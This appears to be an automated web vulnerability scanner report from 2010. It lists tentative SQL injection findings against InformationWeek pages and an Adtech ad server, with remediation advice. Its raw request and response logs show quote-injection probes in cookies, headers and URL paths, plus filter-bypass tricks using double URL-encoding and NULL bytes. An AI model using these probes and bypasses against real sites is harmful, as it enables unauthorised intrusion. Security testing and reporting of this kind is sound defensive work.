SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /addyn/3.0/5242.1/1183258/0/225/ADTECH;alias=DarkReading_Blogs_Top_728x90;key=/blog/archives/evil-bytes/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292112011;misc=1292111961408 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E
Response 1
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19230
The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Blog_GlobalCIO_Bottom_728x90;key=global_cio+/blog/main/archives/global_cio/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=942859226;misc=1292112032219 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E%00'
Response 1 (redirected)
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19359
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET / HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:09 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:09 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 105998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <p> Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p> ...[SNIP]... <P> Microsoft’s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p> ...[SNIP]...
Request 2
GET / HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:12 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:12 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
1.4. http://www.informationweek.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.informationweek.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 106016
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <p> Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p> ...[SNIP]... <P> Microsoft’s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p> ...[SNIP]...
Request 2
GET /?1''=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:39 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:39 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 173030
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M ...[SNIP]... </a> against Google in the U.S. for alleged illegal data interception.<br /> ...[SNIP]...
Request 2
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:56 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:56 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 173030
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M ...[SNIP]... </a> against Google in the U.S. for alleged illegal data interception.<br /> ...[SNIP]...
Request 2
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:58 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:58 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:34 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:34 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days';
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days'';
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/wolfes_den'/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 58155
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den''/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den''/index.html&gateway=true
Connection: close
Content-Type: text/html
